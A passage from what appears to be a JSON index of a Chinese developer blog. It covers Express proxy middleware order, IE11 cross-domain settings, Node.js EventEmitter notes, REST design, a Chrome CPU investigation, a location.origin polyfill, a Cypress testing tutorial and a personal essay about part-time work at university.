restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。","title":"Express代理中间件问题与解决方案"},{"content":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。\n","permalink":"https://wdd.js.org/posts/2018/08/ie-cross-domain-settings/","summary":"IE11有安全设置中有两个选项,\n跨域浏览窗口和框架 通过域访问数据源 如果上面两个选项被禁用,那么IE11会拒绝跨域请求。如果想要跨域成功,必须将上面两个选项设置为启用。\n第一步 打开IE11 点击浏览器右上角的齿轮图标 点击弹框上的 Internet选项 第二步 点击安全 点击Internet 点击自定义级别 第三步 找到跨域浏览窗口和框架\n如果这项是禁用的,那么要勾选启用。\n找到通过域访问数据源\n如果这项是禁用的,那么要勾选启用。\n最后在点击确定。\n最后,如果跨域浏览窗口和框架,通过域访问数据源都启用了,还是无法跨域。那么最好重启一下电脑。有些设置可能在重启后才会生效。","title":"IE11跨域检查跨域设置"},{"content":" 大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 
似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校开展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班坐地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我用能力问别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,达到每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日子过得很苦,但是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】\n","permalink":"https://wdd.js.org/posts/2018/08/the-rest-of-your-life/","summary":" 大三那年的暑假 大三那年暑假,很多同学都回去了,寝室大楼空空如也。\n留在上海的同学都在各自找着兼职的工作,为了不显得无聊,我也在网上随便发了一些简历,试试看运气。\n写简历最难写的部分就是写你自己的长处是什么?搜索枯肠,觉得自己似乎也没什么特长。感觉大学三年学到一些东西,又感觉什么都没学到。\n如果没有特长,总该也有点理想吧,比如想干点什么? 
似乎我也没什么想做的事情。\n小时候我们都有理想,慢慢长大后,理想越来越模糊,变得越来越迷茫。\n大学里,大部分的人都是在打游戏。我也曾迷恋过打游戏,但是因为自己比较菜,总是被虐,所以放弃了。\n但是我也不是那种天天对着笔记本看电视剧的人。\n回忆初三那年的暑假 记得,初三的暑假,我参加了一个学校开展的一个免费的计算机培训班。因为培训的老师说,培训结束前会有一个测试,成绩最好的会有几百块的奖励。\n为了几百块的奖励,我第一个背诵完五笔拆字法。随后老师教了我们PS, 就是photoshop。当时我的理解就是,ps可以做出很多搞笑的图片。\n为了成为一个有能力做出搞笑图片的人。我在高中和大学期间,断断续续的系统的自学了PS。\n下面展示几张我的PS照片\n【毕业照】\n【帮别人做的艺术照】\n【刺客信条 换脸 我自己】\n【旅游照 换脸 我自己】\n【宿舍楼 上面ps了一条狼】\n古玩艺术电商中的店小二 基本上,我的PS技术还是能够找点兼职做的。没过多久,我收到了面试邀请,面试的公司位于一个古玩收藏品市场中。\n当然我面试成功了,开出的日薪也是非常诱人,每天35元。\n在上海,35元一天的工资,除去来回上下班坐地铁和公交,还有中午饭的费用外,基本上不会剩下什么,有时候稍微午饭丰盛点,自己就要倒贴。但是这也是一次不错的尝试,至少有史以来,除去父母以外,我用能力问别人要钱了。\n35元的日薪持续很短一段时间,然后我就涨薪了,达到每天100元。在这个做兼职的地方,我最高拿到的日薪是200元。\n兼职期间我做了各式各样的工作:\n古玩艺术品摄影 海报制作 拍卖图册制作 linux运维 APP UI 设计 网页设计 python爬虫 兼职的日子过得很苦,但是还算充实。虽然工资不高,但是因为还没毕业,也没有奢望过高的工资。\n【上图 我在一个古玩店拍摄玉器的时候,有个小女孩过来找我玩,我随手拍的】\n【上图 是在1号线 莲花路地铁站 因为错过了地铁拍的】\n【上图 是从1号线 莲花地铁站 转公交拍的】\n【每天早上起的很早,能够看到军训的学生在操场上奔跑】\n【在古玩店一般都要拍到很晚,因为是按张数算拍照工资,拍的越多,工资越高。还好晚上回公司 打车费用是可以报销的】\n【晚上还要回到学校,一般到学校就快晚上10点左右了】\n【毕业了,新校区依然很漂亮】\n【毕业了,老校区下了一场雨】\n【毕业了,青春像一艘船,沉入海底】\n【毕业了,我等的人,你在哪里?】","title":"毕业后,青春像一艘船,沉入海底"},{"content":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 
传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.log(a, b, this, this === myEmitter) }) myEmitter.emit(\u0026#39;event\u0026#39;, \u0026#39;a\u0026#39;, {name:\u0026#39;wdd\u0026#39;}) 输出:\na { name: \u0026#39;wdd\u0026#39; } MyEmitter { domain: null, _events: { event: [ [Function], [Function] ] }, _eventsCount: 1, _maxListeners: undefined } true a { name: \u0026#39;wdd\u0026#39; } {} false 4. 同步还是异步调用listeners? emit()法会同步按照事件注册的顺序执行回调 // 03.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;01 an event occurred!\u0026#39;) }) myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;02 an event occurred!\u0026#39;) }) console.log(1) myEmitter.emit(\u0026#39;event\u0026#39;) console.log(2) 输出:\n1 01 an event occurred! 02 an event occurred! 2 深入思考,为什么事件回调要同步?异步了会有什么问题?\n同步去调用事件监听者,能够确保按照注册顺序去调用事件监听者,并且避免竞态条件和逻辑错误。\n5. 如何只订阅一次事件? 使用once去只订阅一次事件 // 04.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() let m = 0 myEmitter.once(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(++m) }) myEmitter.emit(\u0026#39;event\u0026#39;) myEmitter.emit(\u0026#39;event\u0026#39;) 6. 
不订阅,就发飙的错误事件 error是一个特别的事件名,当这个事件被触发时,如果没有对应的事件监听者,则会导致程序崩溃。\nevents.js:183 throw er; // Unhandled \u0026#39;error\u0026#39; event ^ Error: test at Object.\u0026lt;anonymous\u0026gt; (/Users/xxx/github/node-note/events/05.js:12:25) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Function.Module.runMain (module.js:676:10) at startup (bootstrap_node.js:187:16) at bootstrap_node.js:608:3 所以,最好总是给EventEmitter实例添加一个error的监听器\nconst EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;error\u0026#39;, (err) =\u0026gt; { console.log(err) }) console.log(1) myEmitter.emit(\u0026#39;error\u0026#39;, new Error(\u0026#39;test\u0026#39;)) console.log(2) 7. 内部事件 newListener与removeListener newListener与removeListener是EventEmitter实例的自带的事件,你最好不要使用同样的名字作为自定义的事件名。\nnewListener在订阅者被加入到订阅列表前触发 removeListener在订阅者被移除订阅列表后触发 // 06.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;newListener\u0026#39;, (event, listener) =\u0026gt; { console.log(\u0026#39;----\u0026#39;) console.log(event) console.log(listener) }) myEmitter.on(\u0026#39;myEmitter\u0026#39;, (err) =\u0026gt; { console.log(err) }) 输出:\n从输出可以看出,即使没有去触发myEmitter事件,on()方法也会触发newListener事件。\n---- myEmitter [Function] 8. 
事件监听数量限制 myEmitter.listenerCount(\u0026rsquo;event\u0026rsquo;): 用来计算一个实例上某个事件的监听者数量 EventEmitter.defaultMaxListeners: EventEmitter类默认的最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.getMaxListeners(): EventEmitter实例默认的某个事件最大监听者的数量,默认是10。超过会有警告输出。 myEmitter.eventNames(): 返回一个实例上又多少种事件 EventEmitter和EventEmitter实例的最大监听数量为10并不是一个硬性规定,只是一个推荐值,该值可以通过setMaxListeners()接口去改变。\n改变EventEmitter的最大监听数量会影响到所有EventEmitter实例 该变EventEmitter实例的最大监听数量只会影响到实例自身 如无必要,最好的不要去改变默认的监听数量限制。事件监听数量是node检测内存泄露的一个标准一个维度。\nEventEmitter实例的最大监听数量不是一个实例的所有监听数量。\n例如同一个实例A类型事件5个监听者,B类型事件6个监听者,这个并不会有告警。如果A类型有11个监听者,就会有告警提示。\n如果在事件中发现类似的告警提示Possible EventEmitter memory leak detected,要知道从事件最大监听数的角度去排查问题。\n// 07.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() const maxListeners = 11 for (let i = 0; i \u0026lt; maxListeners; i++) { myEmitter.on(\u0026#39;event\u0026#39;, (err) =\u0026gt; { console.log(err, 1) }) } myEmitter.on(\u0026#39;event1\u0026#39;, (err) =\u0026gt; { console.log(err, 11) }) console.log(myEmitter.listenerCount(\u0026#39;event\u0026#39;)) console.log(EventEmitter.defaultMaxListeners) console.log(myEmitter.getMaxListeners()) console.log(myEmitter.eventNames()) 输出:\n11 10 10 [ \u0026#39;event\u0026#39;, \u0026#39;event1\u0026#39; ] (node:23957) MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 event listeners added. Use emitter.setMaxListeners() to increase limit ","permalink":"https://wdd.js.org/posts/2018/08/deepin-nodejs-events/","summary":"1. 环境 node 8.11.3 2. 基本使用 // 01.js const EventEmitter = require(\u0026#39;events\u0026#39;); class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter(); myEmitter.on(\u0026#39;event\u0026#39;, () =\u0026gt; { console.log(\u0026#39;an event occurred!\u0026#39;); }); myEmitter.emit(\u0026#39;event\u0026#39;); 输出:\nan event occurred! 3. 
传参与this指向 emit()方法可以传不限制数量的参数。 除了箭头函数外,在回调函数内部,this会被绑定到EventEmitter类的实例上 // 02.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} const myEmitter = new MyEmitter() myEmitter.on(\u0026#39;event\u0026#39;, function (a, b){ console.log(a, b, this, this === myEmitter) }) myEmitter.on(\u0026#39;event\u0026#39;, (a, b) =\u0026gt; { console.","title":"NodeJS Events 模块笔记"},{"content":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","permalink":"https://wdd.js.org/posts/2018/06/js-download-file/","summary":"需求描述 可以把字符串下载成txt文件 可以把对象序列化后下载json文件 下载由ajax请求返回的Excel, Word, pdf 等等其他文件 基本思想 downloadJsonIVR () { var data = {name: \u0026#39;age\u0026#39;} data = JSON.stringify(data) data = new Blob([data]) var a = document.createElement(\u0026#39;a\u0026#39;) var url = window.URL.createObjectURL(data) a.href = url a.download = \u0026#39;what-you-want.json\u0026#39; a.click() }, 从字符串下载文件 从ajax请求中下载文件 ","title":"JavaScript动态下载文件"},{"content":" 1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. 
REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不回影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让客户端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services ","permalink":"https://wdd.js.org/posts/2018/06/think-about-restful-api/","summary":"1. 什么是REST? 2. REST API最为重要的约束 3. REST API HTTP方法 与 CURD 4. 状态码 5. RESTful架构设计 6. 文档 7. 版本 8. 深入理解状态与无状态 9. 参考 1. 什么是REST? 
表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。 这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。","title":"Restful API 架构思考"},{"content":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 
关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题\n","permalink":"https://wdd.js.org/posts/2018/06/how-to-fix-google-chrome-very-high-cpu-cost/","summary":"1. 问题现象 有时候发现mac风扇响的厉害,于是我检查了mac系统的活动监视器,发现Google Chrome Helper占用99%的CPU。\n通常来说Chrome如果占用过高的内存,这并不是什么问题,毕竟Chrome的性能以及易用性是建立在占用很多内存的基础上的。但是无论什么程序,持续的占用超过80%的cpu,都是极不正常的。大多数程序都是占用维持在低于10%的CPU。\n活动监视器指出问题出现在Chrome浏览器。那么问题可以再次细分为三块。\nChrome系统自身问题 一些插件,例如flash插件,扩展插件 网页程序js出现的问题 2. 从任务管理器着手 其实Chrome浏览器自身也是有任务管理器的,一般来说windows版chrome按住shift+esc就会调出任务管理器窗口。mac版调出任务管理器没有快捷,只能通过Window \u0026gt; Task Manager调出。\n调出任务管理器后,发现一个标签页,CPU占用率达到99%, 那就说明,应该是这个标签页中存在持续占用大量CPU计算的程序。\n最后找到这个页面,发现该页面背景图是一种动态粒子图。就是基于particles.js做的。我想,终于找到你了。\n于是我把这个动态图的相关js代码给注释掉,电脑的风扇也终于变得安静了。\n3. 问题总结 问题解决的总结:解决问题的方法时很简单的,基于一个现象,找到一个原因,基于这个原因再找到一个现象,然后一步一步缩小问题范围,逼近最终原因。\n机器CPU过高,一般都是可以从任务管理器着手解决。系统的任务管理器可以监控各个程序占用的CPU是否正常,通常程序自身也是有任务管理的。\n像谷歌浏览器这种软件,几乎本身就是一个操作系统,所以说它的任务管理器也是必不可少的。Chrome浏览器再带的任务管理器可以告诉你几个关键信息。\n任务占用的内存 任务占用的CPU 任务占用的网络流量大小 如果你一打开谷歌浏览器,你的电脑风扇就拼命转,那你最好打开谷歌浏览器的任务管理器看看。\n4. 关于动态背景图的思考 动态背景图往往都会给人很酷炫的感觉,但是这种背景图的制作并不是很复杂,如果你使用particles.js来制作,制作一些动态背景图只需要几行代码就可以搞定。但是这种酷炫的背后,CPU也在承受着压力。\nparticles.js提供的demo效果图,在Chrome中CPU会被提高到100%。\n也有几家使用动态背景图的官网。我记得知乎以前就用过动态背景图,但是现在找不到了。另外一个使用动态背景图的是daocloud, CPU也是会在首页飙升到50%。\n所谓:强招必自损,动态背景图在给人以炫酷科技感的同时,也需要权衡这种技术对客户计算机的压力。\n另外,不要小看JavaScript, 它也可能引起大问题","title":"记一次如何解决谷歌浏览器占用过高cpu问题过程"},{"content":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? 
\u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); } ","permalink":"https://wdd.js.org/posts/2018/05/ie-not-support-location-origin/","summary":"某些IE浏览器location.origin属性是undefined,所以如果你要使用该属性,那么要注意做个能力检测。\nif (!window.location.origin) { window.location.origin = window.location.protocol + \u0026#34;//\u0026#34; + window.location.hostname + (window.location.port ? \u0026#39;:\u0026#39; + window.location.port: \u0026#39;\u0026#39;); } ","title":"IE浏览器不支持location.origin"},{"content":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electron, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 Debug方便:出错了可以很方便的调试,而不是去猜 3. 为什么要用Cypress? Cypress除基本上拥有了上面的特点之外,还有以下特点。\n时光穿梭 测试运行时,Cypress会自动截图,你可以轻易的查看每个时间的截图 Debug友好 不需要再去猜测为什么测试失败了,Cypress提供Chrome DevTools, 所以Debug是非常方便的。 实时刷新 Cypress检测测试用例改变后,会自动刷新 自动等待 不需要再使用wait类似的方法等待某个DOM出现,Cypress会自动帮你做这些 Spies, stubs, and clocks Verify and control the behavior of functions, server responses, or timers. The same functionality you love from unit testing is right at your fingertips. 网络流量控制 在不涉及服务器的情况下轻松控制,存根和测试边缘案例。无论你喜欢,你都可以存储网络流量。 一致的结果 我们的架构不使用Selenium或WebDriver。向快速,一致和可靠的无剥落测试问好。 截图和视频 查看失败时自动截取的截图,或无条件运行时整个测试套件的视频。 4. 安装cypress 4.1. 使用npm方法安装 注意这个方法需要下载压缩过Electron, 所以可能会花费几分钟时间,请耐心等待。\nnpm i cypress -D 4.2. 直接下载Cypress客户端 你可以把Cypress想象成一个浏览器,可以单独把它下载下来,安装到电脑上,当做一个客户端软件来用。\n打开之后就是这个样子,可以手动去打开项目,运行测试用例。\n5. 
初始化Cypress Cypress初始化,会在项目根目录自动生成cypress文件夹,并且里面有些测试用例模板,可以很方便的学习。\n初始化的方法有两种。\n如果你下载的客户端,那么你用客户端打开项目时,它会检测项目目录下有没有Cypress目录,如果没有,就自动帮你生成模板。\n如果你使用npm安装的Cypress,可以使用命令node_modules/.bin/cypress open去初始化\n6. 编写测试用例 // hacker-news.js describe(\u0026#39;Hacker News登录测试\u0026#39;, () =\u0026gt; { it(\u0026#39;登录页面\u0026#39;, () =\u0026gt; { cy.visit(\u0026#39;https://news.ycombinator.com/login?goto=news\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;acct\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;test\u0026#39;) cy.get(\u0026#39;input[name=\u0026#34;pw\u0026#34;]\u0026#39;).eq(0).type(\u0026#39;123456\u0026#39;) cy.get(\u0026#39;input[value=\u0026#34;login\u0026#34;]\u0026#39;).click() cy.contains(\u0026#39;Bad login\u0026#39;) }) }) 7. 查看结果 打开Cypress客户端,选择要测试项目的根目录,点击hacker-news.js后,测试用例就会自动运行\n运行结束后,左侧栏目鼠标移动上去,右侧栏都会显示出该步骤的截图,所以叫做时光穿梭功能。\n从截图也可以看出来,Cypress的步骤描述很详细。\n","permalink":"https://wdd.js.org/posts/2018/05/e2e-testing-hacker-news-with-cypress/","summary":"1. 目前E2E测试工具有哪些? 项目 Web Star puppeteer Chromium (~170Mb Mac, ~282Mb Linux, ~280Mb Win) 31906 nightmare Electron 15502 nightwatch WebDriver 8135 protractor selenium 7532 casperjs PhantomJS 7180 cypress Electron 5303 Zombie 不需要 4880 testcafe 不需要 4645 CodeceptJS webdriverio 1665 端到端测试一般都需要一个Web容器,来运行前端应用。例如Chromium, Electron, PhantomJS, WebDriver等等。\n从体积角度考虑,这些Web容器体积一般都很大。\n从速度的角度考虑:PhantomJS, WebDriver \u0026lt; Electon, Chromium。\n而且每个工具的侧重点也不同,建议按照需要去选择。\n2. 优秀的端到端测试工具应该有哪些特点? 安装简易:我希望它非常容易安装,最好可以一行命令就可以安装完毕 依赖较少:我只想做个E2E测试,不想安装jdk, python之类的东西 速度很快:运行测试用例的速度要快 报错详细:详细的报错 API完备:鼠标键盘操作接口,DOM查询接口等 